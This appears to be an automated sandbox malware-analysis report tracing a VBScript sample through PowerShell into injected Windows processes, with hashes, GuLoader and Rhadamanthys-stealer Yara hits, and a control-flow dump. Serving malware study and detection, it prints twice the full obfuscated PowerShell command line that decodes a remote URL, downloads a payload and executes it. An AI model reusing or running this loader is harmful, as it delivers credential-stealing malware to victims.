                                                                              Start date:19/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\tmkSAOF3GM.vbs"
                                                                              Imagebase:0x7ff762530000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:06:37:23
                                                                              Start date:19/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Taksig0Kakotop0 anaest2 Period)Seychel Aggradi{FootlogS Bungfut NonzooaTrivialrFabrikatKlenodi- LugginSPerfidilHenfaldeKlerneie MoorwopJordemo Nonsema1Salderi} PreindeKrabberlTeckpresUpsoarseFarmace{MeierunSWolfwartKlovsyga Archbir TyroletSmoothi- UnrebuSChelatilObjektoeSpisesieNemophipKalfakt Hypers1Plodder;FiddlewFAntiboyoMycenaelProtamik AseptieMonumenmHeteronu SnittenBuksestdLseprve yngstee$ TriumfB MilligeYversprchandfasiHastedufPragmatr Trisom2Pilgrim0 Mycolo0 Nonatr0 Behjlp}Stmaale ');Folkemund (Opinions ' Plushe$SurvivegEngraphlOldsteroorchidobConvinca ReplialReolplj:EscalieTColouriaShovelscforankrk DagvoglSthamreeKonjunksencrownsOversaeeCuddies2 Unmagi2Unsquan1Krydder7Revampm=Trollys( OveratTSpringteVaadeousBakkanatGaugepa-DevilkiPPenworkaIsafklntEliderehInfekti Mistelt$BoldosrTBaalishaKlistricPorophykforlystlGaldesteImmunotsOpsamlisSummerseAlannah2Chorioa2 Avissp1Accepte2Biparti)Feather ') ;}Folkemund (Opinions 'Cannone$spectacg snydetl VendekoArmbaanbGaasejnaCalvarilHydraul:CystatrPBromomeo PrintesPraestctNdstilft Emusif Henrykk= Izarsi OverchaGdelthyre CarcantSagsbeh-KingstoCRevereno AgglutnSkippabtGenskabe PimpernFunctiotMarnasr revanch$ProvisoT KulsyraAvislsncFrugtesk Flgelil BetonkeFluevgts BocegesTransfee Afstrm2Replice2sedimen1Kontrol2 Elonga ');Folkemund (Opinions 'Sidstfd$OverhrtgClaimanl RuddygoStinksvb HjlpesaKnoklerlElectro:NellisfD GribaniGrundlngDemijohtIndaandeRefinag Unseeab=Hairspr Thymel[SlantinSFkalvulyTiggergsFremstitMonograeDatamaemFeeblen.StentorCMaudlinoAfsindinlimpindvArrogate KaraktrOverclotSubfree]Settsma:Antever: heubleFCaricesrZooplasoJivaranmLakersnB ContriaKvrulansLandskaeUdflytt6Afskdpr4RostbfeSUfuldkot SmudgirombetrkinonpondnJuncosggslappel(Hemagog$OvermtnPNondilaoJardinesforcedntMartyrotBrnepsy) Indlae ');Folkemund (Opinions 'Ragende$Strejkeg SkreknlEsophagoConfronbBlasfema GynaeclUnavngi:ForholdBUdmeldeebrikvvncFilingfiSubiintfMetempirBrabant2Aaregan0Indoktr2 nedfal Dyretm=Tvangsf Teagle[PoutfulSBroddedyBespndisNurturetEquiforemetachrmLausann.ghuzostTprodukteDesistmxEkkoerst Hvedem.MelismaEIvrksatn KvikkecOverwovoMunitiod Lommesi Paalgsn StrandgFjordmu] Nonacc:Miswors: ergonoA crozehSSlgternC FravleIGrshoppI Afvikl.AppretuGAnimateeVandalit SlubbiSLreansttublufrdr NobatciBanemrknUntimelgMinuetd(Paleoli$HousewrDAssisteiDipleurgAnekdottEtuastye Skille)Amorinl ');Folkemund (Opinions ' Unprot$kraftfugLumperal LexigroUnavngibProfittaAfsindilNictate:NoniehvBTropsveeBenzoxacrickraciSempitefAutopsyrMarskal2Elefant0Forsoeg3Outtopp= Skrppe$YpperhiBSceptereRailerscKreditfiUndervifKbstadsrSpitchc2 Borgen0sprutte2Deanthr.FuturumsRoesukkuTikronebReversisOvervaat Periscr Masteri Bankopn MetalkgHildrel(Digamis2 Alling9Embryol0 Indsti0Bombaze3Eleuthe0 Conque,Inquest2 Brndgl3 Maalea7Mausole4Seriefo5Benpibe)Kostsko ');Folkemund $Becifr203;"
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1966922652.000001EC5E145000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:06:37:23
                                                                              Start date:19/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:06:37:26
                                                                              Start date:19/12/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff7b4ee0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:6
                                                                              Start time:06:37:36
                                                                              Start date:19/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 'Oliearb$ThermotgSvindlelAffatteoBlgenexbParadigaMrkbarelDelouse: KvindeTBivognra Pectinc NonbudkBiindtglPlanisheCryptocsOvervinsBootstreTelangi2svejser2Notewis1Omstnin2Fugleko=Mandler$MurkroneVenskabnStandarvDemenss:KladdebaSpiritup HdersppBandernd Cybelea FrisketOscularaElkhorn ') ;Folkemund (Opinions 'VespertICanamoam Podophp RaketvoPorionsrForstant dimnaf- SprayeMBevrtnioProgramdTrepaneuBesiegelBygninge Fodred HematocB CoupeeiStambortDameskrsCartogrTHawsepirTyvekroa SkrivenFlaadeos Metrecf Serrate Sluknirhypochn ') ;$Tacklesse2212=$Tacklesse2212+'\Inte.reg' ;Folkemund (Opinions ' Swazil$LivligegCyclohel Dartleo Paternb thengeasorehealpolrtch:BoligmiTDecolouaRevanchcNonconfkFormatklIvorineeCoactivs NailapsHerediteMoorman2Sagvold2Hertugd1Langtur7Otectom=Eventua(HeterogTPikakefenydannesUdmajnitUndlade-UltramaPWarlockaNymphomtVerdenehCricket Concept$FagbevgT AcetaraAmminoscheniquekRegnefulUninvadeKonfliksEnchases BestaneInflowe2Potrero2 Satsbi1rillsto2Grafolo)Beholde ') ;while (-not $Tacklesse2217) {Folkemund (Opinions 'HaandboI KehoeifOntocyc Parachu( Fortst$GuisardTPrimtalaSammenscGrittedkAkademilWitnessesynanthsPantheisBegramseDagtyve2ludebro2Mostere1Vejledn8Henlgge.HestehaJBarselsoDscommub TrgrnoSOmsadlitfishetkalevittet Interseridicul Impossi- DecubieargumenqForeskr Kontrol$BraseneBMaglemoeHyppigecTeodiczi KuskecfAllehelrLeguage2 Taksig0Kakotop0 anaest2 Period)Seychel Aggradi{FootlogS Bungfut NonzooaTrivialrFabrikatKlenodi- LugginSPerfidilHenfaldeKlerneie MoorwopJordemo Nonsema1Salderi} PreindeKrabberlTeckpresUpsoarseFarmace{MeierunSWolfwartKlovsyga Archbir TyroletSmoothi- UnrebuSChelatilObjektoeSpisesieNemophipKalfakt Hypers1Plodder;FiddlewFAntiboyoMycenaelProtamik AseptieMonumenmHeteronu SnittenBuksestdLseprve yngstee$ TriumfB MilligeYversprchandfasiHastedufPragmatr Trisom2Pilgrim0 Mycolo0 Nonatr0 Behjlp}Stmaale ');Folkemund (Opinions ' Plushe$SurvivegEngraphlOldsteroorchidobConvinca ReplialReolplj:EscalieTColouriaShovelscforankrk DagvoglSthamreeKonjunksencrownsOversaeeCuddies2 Unmagi2Unsquan1Krydder7Revampm=Trollys( OveratTSpringteVaadeousBakkanatGaugepa-DevilkiPPenworkaIsafklntEliderehInfekti Mistelt$BoldosrTBaalishaKlistricPorophykforlystlGaldesteImmunotsOpsamlisSummerseAlannah2Chorioa2 Avissp1Accepte2Biparti)Feather ') ;}Folkemund (Opinions 'Cannone$spectacg snydetl VendekoArmbaanbGaasejnaCalvarilHydraul:CystatrPBromomeo PrintesPraestctNdstilft Emusif Henrykk= Izarsi OverchaGdelthyre CarcantSagsbeh-KingstoCRevereno AgglutnSkippabtGenskabe PimpernFunctiotMarnasr revanch$ProvisoT KulsyraAvislsncFrugtesk Flgelil BetonkeFluevgts BocegesTransfee Afstrm2Replice2sedimen1Kontrol2 Elonga ');Folkemund (Opinions 'Sidstfd$OverhrtgClaimanl RuddygoStinksvb HjlpesaKnoklerlElectro:NellisfD GribaniGrundlngDemijohtIndaandeRefinag Unseeab=Hairspr Thymel[SlantinSFkalvulyTiggergsFremstitMonograeDatamaemFeeblen.StentorCMaudlinoAfsindinlimpindvArrogate KaraktrOverclotSubfree]Settsma:Antever: heubleFCaricesrZooplasoJivaranmLakersnB ContriaKvrulansLandskaeUdflytt6Afskdpr4RostbfeSUfuldkot SmudgirombetrkinonpondnJuncosggslappel(Hemagog$OvermtnPNondilaoJardinesforcedntMartyrotBrnepsy) Indlae ');Folkemund (Opinions 'Ragende$Strejkeg SkreknlEsophagoConfronbBlasfema GynaeclUnavngi:ForholdBUdmeldeebrikvvncFilingfiSubiintfMetempirBrabant2Aaregan0Indoktr2 nedfal Dyretm=Tvangsf Teagle[PoutfulSBroddedyBespndisNurturetEquiforemetachrmLausann.ghuzostTprodukteDesistmxEkkoerst Hvedem.MelismaEIvrksatn KvikkecOverwovoMunitiod Lommesi Paalgsn StrandgFjordmu] Nonacc:Miswors: ergonoA crozehSSlgternC FravleIGrshoppI Afvikl.AppretuGAnimateeVandalit SlubbiSLreansttublufrdr NobatciBanemrknUntimelgMinuetd(Paleoli$HousewrDAssisteiDipleurgAnekdottEtuastye Skille)Amorinl ');Folkemund (Opinions ' Unprot$kraftfugLumperal LexigroUnavngibProfittaAfsindilNictate:NoniehvBTropsveeBenzoxacrickraciSempitefAutopsyrMarskal2Elefant0Forsoeg3Outtopp= Skrppe$YpperhiBSceptereRailerscKreditfiUndervifKbstadsrSpitchc2 Borgen0sprutte2Deanthr.FuturumsRoesukkuTikronebReversisOvervaat Periscr Masteri Bankopn MetalkgHildrel(Digamis2 Alling9Embryol0 Indsti0Bombaze3Eleuthe0 Conque,Inquest2 Brndgl3 Maalea7Mausole4Seriefo5Benpibe)Kostsko ');Folkemund $Becifr203;"
                                                                              Imagebase:0xb30000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1744049696.0000000009D30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.1744712074.000000000B010000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1733782746.0000000005E26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:08:28:37
                                                                              Start date:19/12/2024
                                                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                              Imagebase:0x500000
                                                                              File size:516'608 bytes
                                                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000008.00000003.1770106522.00000000240B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000003.1760404109.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000003.1761640645.00000000046B0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000008.00000003.1758009836.0000000002800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000003.1760674277.00000000247D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:08:28:51
                                                                              Start date:19/12/2024
                                                                              Path:C:\Windows\SysWOW64\dialer.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\dialer.exe"
                                                                              Imagebase:0x90000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:E4BD77FB64DDE78F1A95ECE09F6A9B85
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.1761896364.0000000003010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.1835517097.0000000005501000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1764322214.0000000005380000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1764142605.0000000005160000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000002.2611366483.00000000053C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:5.2%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:41.7%
                                                                                Total number of Nodes:12
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 8880 7ffaab77e6a0 8881 7ffaab77e6a9 8880->8881 8882 7ffaab77e63e IUnknown_QueryInterface_Proxy 8881->8882 8884 7ffaab77e6bb 8881->8884 8883 7ffaab77e678 8882->8883 8885 7ffaab77bdc5 8888 7ffaab77af80 8885->8888 8887 7ffaab77bdcd 8891 7ffaab77af8e 8888->8891 8892 7ffaab77af97 8888->8892 8889 7ffaab77b194 CoCreateInstance 8890 7ffaab77b1fb 8889->8890 8890->8887 8891->8889 8891->8892 8892->8887

                                                                                Executed Functions

                                                                                Function 00007FFAAB779A45 Relevance: 17.5, Strings: 13, Instructions: 1291COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 7ffaab779a45-7ffaab779a49 1 7ffaab779a4b-7ffaab779a68 0->1 2 7ffaab7799f5-7ffaab779a05 0->2 6 7ffaab779a06 1->6 8 7ffaab779a6b-7ffaab779a72 1->8 5 7ffaab779a07-7ffaab77c62a 2->5 2->6 30 7ffaab77c62c 5->30 31 7ffaab77c632-7ffaab77c64e 5->31 6->5 11 7ffaab779aea-7ffaab779b4d 8->11 12 7ffaab779a74-7ffaab779ae8 8->12 19 7ffaab779b60-7ffaab779b96 call 7ffaab7796c0 call 7ffaab776188 11->19 20 7ffaab779b4f-7ffaab779b5f 11->20 12->11 33 7ffaab779bab-7ffaab779bb4 19->33 34 7ffaab779b98-7ffaab779ba8 call 7ffaab776d90 19->34 30->31 36 7ffaab779c3f-7ffaab779c54 call 7ffaab7761b8 33->36 37 7ffaab779bba-7ffaab779bde 33->37 34->33 41 7ffaab779c59-7ffaab779c69 36->41 37->36 42 7ffaab779c6b-7ffaab779c83 call 7ffaab776d98 call 7ffaab777ef8 41->42 43 7ffaab779c88-7ffaab779cb0 call 7ffaab776de0 41->43 42->43 48 7ffaab779d17-7ffaab779d23 43->48 49 7ffaab779cb2-7ffaab779d12 call 7ffaab778010 43->49 52 7ffaab779db1-7ffaab779dd8 call 7ffaab777ed8 48->52 53 7ffaab779d29-7ffaab779d4d 48->53 82 7ffaab77a879-7ffaab77a883 call 7ffaab77a98f 49->82 58 7ffaab779dda-7ffaab779de4 52->58 59 7ffaab779de6 52->59 53->52 61 7ffaab779deb-7ffaab779ded 58->61 59->61 62 7ffaab779def-7ffaab779e01 call 7ffaab777ee8 61->62 63 7ffaab779e06-7ffaab779e11 61->63 62->63 66 7ffaab779e29-7ffaab779e34 63->66 67 7ffaab779e13-7ffaab779e24 call 7ffaab777f08 63->67 70 7ffaab779e4c-7ffaab779e57 66->70 71 7ffaab779e36-7ffaab779e47 call 7ffaab777f18 66->71 67->66 73 7ffaab779e6f-7ffaab779e7a 70->73 74 7ffaab779e59-7ffaab779e6a call 7ffaab777f28 70->74 71->70 75 7ffaab779e7c-7ffaab779e8d call 7ffaab777e48 73->75 76 7ffaab779e92-7ffaab779e9d 73->76 74->73 75->76 80 7ffaab779e9f-7ffaab779eb0 call 7ffaab777e68 76->80 81 7ffaab779eb5-7ffaab779ec0 76->81 80->81 84 7ffaab779ed8-7ffaab779ee3 81->84 85 7ffaab779ec2-7ffaab779ed3 call 7ffaab777e78 81->85 94 7ffaab77a886-7ffaab77a892 82->94 88 7ffaab779efb-7ffaab779f07 84->88 89 7ffaab779ee5-7ffaab779ef6 call 7ffaab778028 84->89 85->84 92 7ffaab77a24d-7ffaab77a259 88->92 93 7ffaab779f0d-7ffaab779f51 88->93 89->88 95 7ffaab77a2b0-7ffaab77a2bc 92->95 96 7ffaab77a25b-7ffaab77a267 92->96 111 7ffaab77a22f-7ffaab77a248 call 7ffaab776da0 call 7ffaab777f48 93->111 112 7ffaab779f57-7ffaab779f63 93->112 98 7ffaab77a2be-7ffaab77a2ca 95->98 99 7ffaab77a313-7ffaab77a31e 95->99 96->95 97 7ffaab77a269-7ffaab77a2ab call 7ffaab776db0 call 7ffaab776da8 call 7ffaab778030 96->97 97->95 98->99 104 7ffaab77a2cc-7ffaab77a30e call 7ffaab776db0 call 7ffaab776da8 call 7ffaab778030 98->104 101 7ffaab77a331-7ffaab77a33d 99->101 102 7ffaab77a320-7ffaab77a32c call 7ffaab777e58 99->102 107 7ffaab77a429-7ffaab77a434 101->107 108 7ffaab77a343-7ffaab77a357 101->108 102->101 104->99 113 7ffaab77a436-7ffaab77a43d call 7ffaab778048 107->113 114 7ffaab77a442-7ffaab77a455 107->114 121 7ffaab77a38f-7ffaab77a39f 108->121 122 7ffaab77a359-7ffaab77a38c 108->122 111->92 118 7ffaab779f69-7ffaab779f7b 112->118 119 7ffaab77a187-7ffaab77a193 112->119 113->114 124 7ffaab77a480-7ffaab77a48c 114->124 125 7ffaab77a457-7ffaab77a465 114->125 128 7ffaab779f81-7ffaab779f8e 118->128 129 7ffaab77a135-7ffaab77a182 call 7ffaab777e20 118->129 119->92 130 7ffaab77a199-7ffaab77a1aa 119->130 135 7ffaab77a3a1-7ffaab77a3d4 121->135 136 7ffaab77a403-7ffaab77a424 call 7ffaab777f78 121->136 122->121 137 7ffaab77a5c5-7ffaab77a5d1 124->137 138 7ffaab77a492-7ffaab77a4ed 124->138 133 7ffaab77a471-7ffaab77a47b call 7ffaab777e88 125->133 134 7ffaab77a467 125->134 147 7ffaab779f94-7ffaab779fbb 128->147 148 7ffaab77a102-7ffaab77a10c 128->148 129->119 149 7ffaab77a1ac-7ffaab77a1c3 130->149 150 7ffaab77a1db-7ffaab77a22d call 7ffaab777e20 130->150 133->124 134->133 135->136 136->107 142 7ffaab77a60d-7ffaab77a618 137->142 143 7ffaab77a5d3-7ffaab77a5df 137->143 180 7ffaab77a6ac 138->180 181 7ffaab77a4f3-7ffaab77a507 138->181 153 7ffaab77a810-7ffaab77a81b 142->153 154 7ffaab77a61e-7ffaab77a629 142->154 143->142 152 7ffaab77a5e1-7ffaab77a608 call 7ffaab778050 143->152 174 7ffaab779fbd-7ffaab779fe4 147->174 175 7ffaab779fea-7ffaab77a039 147->175 167 7ffaab77a10e-7ffaab77a112 148->167 168 7ffaab77a114-7ffaab77a115 148->168 149->150 150->92 152->142 162 7ffaab77a81d-7ffaab77a824 call 7ffaab778008 153->162 163 7ffaab77a829-7ffaab77a835 153->163 154->153 161 7ffaab77a62f-7ffaab77a675 call 7ffaab778008 call 7ffaab777ed0 154->161 237 7ffaab77a69e-7ffaab77a6aa call 7ffaab777ec0 161->237 238 7ffaab77a677-7ffaab77a69c call 7ffaab777ed0 161->238 162->163 163->94 182 7ffaab77a837-7ffaab77a84d call 7ffaab777e38 163->182 177 7ffaab77a118-7ffaab77a12f 167->177 168->177 174->148 174->175 177->128 177->129 191 7ffaab77a6b1-7ffaab77a6b8 call 7ffaab777ed0 180->191 186 7ffaab77a56b-7ffaab77a5c0 call 7ffaab777e98 181->186 187 7ffaab77a509-7ffaab77a53c 181->187 200 7ffaab77a84f-7ffaab77a852 182->200 201 7ffaab77a8be-7ffaab77a8cc 182->201 186->137 187->186 203 7ffaab77a6bd-7ffaab77a6e1 call 7ffaab776dd0 call 7ffaab777ea8 191->203 206 7ffaab77a8ce-7ffaab77a8e2 200->206 207 7ffaab77a854 200->207 201->206 228 7ffaab77a6f4-7ffaab77a703 call 7ffaab777ea8 203->228 229 7ffaab77a6e3-7ffaab77a6ea call 7ffaab778018 203->229 210 7ffaab77a7db-7ffaab77a7e9 call 7ffaab777e38 207->210 211 7ffaab77a856 207->211 216 7ffaab77a85a-7ffaab77a862 210->216 224 7ffaab77a7eb-7ffaab77a7ef 210->224 211->216 221 7ffaab77a870-7ffaab77a878 216->221 221->82 224->221 230 7ffaab77a7f1-7ffaab77a7f8 224->230 247 7ffaab77a71a-7ffaab77a735 call 7ffaab777f30 228->247 248 7ffaab77a705-7ffaab77a714 call 7ffaab777ea8 228->248 240 7ffaab77a6ef 229->240 235 7ffaab77a7fa-7ffaab77a7ff 230->235 236 7ffaab77a874-7ffaab77a878 230->236 242 7ffaab77a801-7ffaab77a80e 235->242 243 7ffaab77a880-7ffaab77a883 235->243 236->82 237->203 238->191 238->237 240->82 242->82 243->94 261 7ffaab77a737-7ffaab77a785 call 7ffaab776228 call 7ffaab776230 247->261 262 7ffaab77a786-7ffaab77a7c0 call 7ffaab778010 247->262 248->247 258 7ffaab77a7c5-7ffaab77a7d8 248->258 258->210 261->262 262->82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1993017959.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
